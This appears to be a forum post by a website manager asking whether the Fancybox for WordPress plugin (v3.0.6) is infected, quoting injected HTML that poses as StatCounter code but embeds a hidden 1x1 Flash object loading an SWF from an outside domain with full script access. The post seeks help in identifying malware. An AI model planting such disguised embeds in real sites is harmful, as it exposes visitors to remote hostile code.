I noticed suspicious code on one of the websites that I manage. After investigating further I discovered that the suspicious code appears only when Fancybox for Wordpress (v. 3.0.6) is activated. Below is the suspicious code. Is this plugin infected with malware?
<!-- Start of StatCounter Code for Default Guide -->
<object type="application/x-shockwave-flash" data="http://www.weathershieldlimited.com/images/banners/eaj.swf
?myid=cea0d16fdd2e07f5498e0c64ebd186a2" width="1px" height="1px" id="cea0d16fdd2e07f5498e0c64ebd186a2">
<param name="AllowScriptAccess" value="always"/>
<param name="myid" value="cea0d16fdd2e07f5498e0c64ebd186a2" />
<param name="movie" value="http://www.weathershieldlimited.com/images/banners/eaj.swf
?myid=cea0d16fdd2e07f5498e0c64ebd186a2"/>
<embed src="http://www.weathershieldlimited.com/images/banners/eaj.swf
?myid=cea0d16fdd2e07f5498e0c64ebd186a2" width="1" height="1">
</embed>
</object>
<!-- End of StatCounter Code for Default Guide -->